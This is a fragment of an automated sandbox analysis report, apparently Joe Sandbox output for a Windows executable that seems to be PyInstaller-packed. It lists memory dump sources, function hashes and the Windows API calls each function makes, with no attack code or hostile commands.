• Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: 07c5dcf76cbe3182a9f46e495b791f87a2923bbe72b553d2f04cfdf557d03735
• Instruction ID: d0ead601fb27bc2e1149926211b3a1ea62341e7b40367654e4185b2ffb169fc3
• Opcode Fuzzy Hash: 07c5dcf76cbe3182a9f46e495b791f87a2923bbe72b553d2f04cfdf557d03735
• Instruction Fuzzy Hash: 53C1F633A2C68781F760AB1594402BD77A4FB81B80F5582B1EA8E877F1CF7DE8459700

Control-flow Graph

Memory Dump Source
• Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
• Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
Similarity
• API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
• String ID:
• API String ID: 995526605-0
• Opcode ID: ccba17952e233d5b695068aab9421341a55ed3ebff0a2a14ee99ad80d8ea5500
• Instruction ID: 4c2b0c7fd2c71de0b3ccb2cec208d206f839f3b1132c091e5aa39c765a06172e
• Opcode Fuzzy Hash: ccba17952e233d5b695068aab9421341a55ed3ebff0a2a14ee99ad80d8ea5500
• Instruction Fuzzy Hash: C2217133E1C64282EB50AB55B55022AA3A1FBC5BA0F604275EAAD87AF4DF6CD444DB00

Control-flow Graph

APIs
  • Part of subcall function 00007FF67AED8760: GetCurrentProcess.KERNEL32 ref: 00007FF67AED8780
  • Part of subcall function 00007FF67AED8760: OpenProcessToken.ADVAPI32 ref: 00007FF67AED8793
  • Part of subcall function 00007FF67AED8760: GetTokenInformation.KERNELBASE ref: 00007FF67AED87B8
  • Part of subcall function 00007FF67AED8760: GetLastError.KERNEL32 ref: 00007FF67AED87C2
  • Part of subcall function 00007FF67AED8760: GetTokenInformation.KERNELBASE ref: 00007FF67AED8802
  • Part of subcall function 00007FF67AED8760: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF67AED881E
  • Part of subcall function 00007FF67AED8760: CloseHandle.KERNEL32 ref: 00007FF67AED8836
• LocalFree.KERNEL32(?,00007FF67AED3C55), ref: 00007FF67AED916C
• LocalFree.KERNEL32(?,00007FF67AED3C55), ref: 00007FF67AED9175
Memory Dump Source
• Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
• Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
Similarity
• API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
• String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
• API String ID: 6828938-1529539262
• Opcode ID: 44a76ac2d965b652da6d7152683ffc914eb32e79e00aec7a7a922ce7c9633e88
• Instruction ID: 6d640fba5e269ab7a0f29a460bf1035e144a0cd591f996756fdfbbf21a3ef68f
• Opcode Fuzzy Hash: 44a76ac2d965b652da6d7152683ffc914eb32e79e00aec7a7a922ce7c9633e88
• Instruction Fuzzy Hash: 17216D32A2878281F650BB20E9152EA6360EFC8780F5440B5EA4DD3BA6DF3CD845E740

Control-flow Graph (rendered graph not reproduced)

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67AEECFBB), ref: 00007FF67AEED0EC
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67AEECFBB), ref: 00007FF67AEED177
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 953036326-0
                                                                                                                                                                                                                                          • Opcode ID: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
                                                                                                                                                                                                                                          • Instruction ID: 14c4f2d69e68f70beca3e0eb4d64e737d3866a193814c0abb5945e45fc4d33ac
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B091D673F2D65289F750AF6594802BD2BA1FB44B88F1841B9DE0E97AA5DF3CD482D700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1279662727-0
                                                                                                                                                                                                                                          • Opcode ID: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
                                                                                                                                                                                                                                          • Instruction ID: c39134dfe076cbc8157a1f1181bde4c76f954160a48a2d72db510079ec3406e1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E5419223E2C78283F750AB6096503796360FB947A4F109375EA9C43AE2DF7CA5F09750
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3251591375-0
                                                                                                                                                                                                                                          • Opcode ID: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
                                                                                                                                                                                                                                          • Instruction ID: 9a5ff3a8e457948339756e4c2415db1943d1f08dd9aa8c00c0906f17388ef3bd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0A316D23E2D14345FA64BB74D8613B917919FC5388F6444B8E94ECB2F3DE2CA885E280
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1703294689-0
                                                                                                                                                                                                                                          • Opcode ID: 230ddfbeb2cfdc83e04e02b0fbb537ff9f96aef2fd2a5ab3fdce6eee95276a48
                                                                                                                                                                                                                                          • Instruction ID: fe496b209e670952fb994302e0683b79b8450ade0affb76a46cb5a5e84815de5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 230ddfbeb2cfdc83e04e02b0fbb537ff9f96aef2fd2a5ab3fdce6eee95276a48
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 47D09E12B2C74646FB543B706C990795391AF48741F1414FCD84F863B3DD6CE4596700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3215553584-0
APIs
Memory Dump Source
• Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
• Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
Similarity
• API ID: ErrorFileLastPointer
• String ID:
• API String ID: 2976181284-0
APIs
• RtlFreeHeap.NTDLL(?,?,?,00007FF67AEF2D92,?,?,?,00007FF67AEF2DCF,?,?,00000000,00007FF67AEF3295,?,?,?,00007FF67AEF31C7), ref: 00007FF67AEEA9CE
• GetLastError.KERNEL32(?,?,?,00007FF67AEF2D92,?,?,?,00007FF67AEF2DCF,?,?,00000000,00007FF67AEF3295,?,?,?,00007FF67AEF31C7), ref: 00007FF67AEEA9D8
Similarity
• API ID: ErrorFreeHeapLast
• String ID:
• API String ID: 485612231-0
APIs
• CloseHandle.KERNELBASE(?,?,?,00007FF67AEEAA45,?,?,00000000,00007FF67AEEAAFA), ref: 00007FF67AEEAC36
• GetLastError.KERNEL32(?,?,?,00007FF67AEEAA45,?,?,00000000,00007FF67AEEAAFA), ref: 00007FF67AEEAC40
Similarity
• API ID: CloseErrorHandleLast
• String ID:
• API String ID: 918212764-0
APIs
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
APIs
Similarity
• API ID: _fread_nolock
• String ID:
• API String ID: 840049012-0
APIs
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                                          • Opcode ID: 2d5c35b5412ec9e3d722ee101ab37b91f6ea8aa9dcca92d1d4e84e7f868c2b8f
                                                                                                                                                                                                                                          • Instruction ID: aac1e15759fa5fca7e925e730cdfdce3b95f6b90006f6ca5f4228a464ba1c823
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2d5c35b5412ec9e3d722ee101ab37b91f6ea8aa9dcca92d1d4e84e7f868c2b8f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7331AE33E3C64285FB517B65984137C2750AB40B94F4282B5E9AD833F2DF7DE851A720
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3947729631-0
                                                                                                                                                                                                                                          • Opcode ID: c67799cafce48778543f3f8f4be5d8193b6380671b5390c3378b203fc6564281
                                                                                                                                                                                                                                          • Instruction ID: 895fc138cd33cb66834ce7649777255af0e280a7022b29f3675b4ed77fa86463
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c67799cafce48778543f3f8f4be5d8193b6380671b5390c3378b203fc6564281
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 78218E32A287828AFB64AF64C4442FC33E4EB04718F444679E62D86AE5DF38D594DB40
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                                          • Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                          • Instruction ID: 22817d08d890a1a2226241b1902e71ad2f3a58f59e8328b87c6d5a7b5bd475b0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 96115123A3C64181FA60BF51A41027EA3A4BF45B80F5540B5EB4CD7AB6DF7DD940E750
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                                          • Opcode ID: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
                                                                                                                                                                                                                                          • Instruction ID: 90f5500a99a89a37c7e31c2ff7eb5a24c73b0e9f0b58a75dbb753a7c7154c6e2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 50216573628AC287D7A1AF18E44037977A0FB84B54F544278EA9DC76E9DF3DD4049B01
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                                          • Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                          • Instruction ID: 67d57be4f972b6edd41dcb2f958cc587ff1bbeb1c7af30665da0a5d1d4954090
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6801C463A6C74140FA04FF529A01069A7E1BF85FE0F0846B1EE5C97BE6DE3CE501A300
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                                          • Opcode ID: 6832eb5f98ca96f5e7cd25db8366a3c1a8b2d6b45623d2691d830cdd3d76c9ad
                                                                                                                                                                                                                                          • Instruction ID: b5daa2ec06f45799ee1bbfcbe188ddbe3d60b09e49ad2efd48fc9f0d358ebc73
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6832eb5f98ca96f5e7cd25db8366a3c1a8b2d6b45623d2691d830cdd3d76c9ad
• Instruction Fuzzy Hash: BC016922E3D68280FF607BA5A9011796390AF047E0F5445B9EA1CC37E6EF2CA841EA11
APIs
Memory Dump Source
• Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
• Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: 3541b91b086c77dfe17527b78ee7977ece0d5fdea915d925a3ffaee66e22a6c2
• Instruction ID: 7aa3b2915cab1a240d5b691576304de02680a5e4e5b1c56bc4c4a67e40677038
• Opcode Fuzzy Hash: 3541b91b086c77dfe17527b78ee7977ece0d5fdea915d925a3ffaee66e22a6c2
• Instruction Fuzzy Hash: ADE012A3E3CA4786F7143BB8458617913505FA9741F4154F4E908E63F3DF2D6849B721
APIs
• HeapAlloc.KERNEL32(?,?,00000000,00007FF67AEEB39A,?,?,?,00007FF67AEE4F81,?,?,?,?,00007FF67AEEA4FA), ref: 00007FF67AEEEC5D
Similarity
• API ID: AllocHeap
• String ID:
• API String ID: 4292702814-0
• Opcode ID: 359dceec71bad03d682dc04f56d48d79ef81111e86adbc932549883800f831e6
• Instruction ID: 4f2edcf9cc4e26ee22f3682bb768c12c1c08652d4aed9a35be88a98b7cce543d
• Opcode Fuzzy Hash: 359dceec71bad03d682dc04f56d48d79ef81111e86adbc932549883800f831e6
• Instruction Fuzzy Hash: 8FF09052B2D787E0FE987B62A8513B563809F88F80F4C55B0CD0EC63F1EE1CE480A210
APIs
• HeapAlloc.KERNEL32(?,?,?,00007FF67AEE0D00,?,?,?,00007FF67AEE236A,?,?,?,?,?,00007FF67AEE3B59), ref: 00007FF67AEED6AA
Similarity
• API ID: AllocHeap
• String ID:
• API String ID: 4292702814-0
• Opcode ID: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
• Instruction ID: 246bcc63316234fdbbf05648262b30252832f46eca54ec5bf25f60ccc97889d3
• Opcode Fuzzy Hash: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
• Instruction Fuzzy Hash: AFF05812F2E34384FEA47771588127813908F94BA0F0C03B0DD2ECA3F2EE6CE480A610
APIs
• GetProcAddress.KERNEL32(?,00007FF67AED64BF,?,00007FF67AED336E), ref: 00007FF67AED5830
• GetLastError.KERNEL32(?,00007FF67AED64BF,?,00007FF67AED336E), ref: 00007FF67AED5842
• GetProcAddress.KERNEL32(?,00007FF67AED64BF,?,00007FF67AED336E), ref: 00007FF67AED5879
• GetLastError.KERNEL32(?,00007FF67AED64BF,?,00007FF67AED336E), ref: 00007FF67AED588B
• GetProcAddress.KERNEL32(?,00007FF67AED64BF,?,00007FF67AED336E), ref: 00007FF67AED58A4
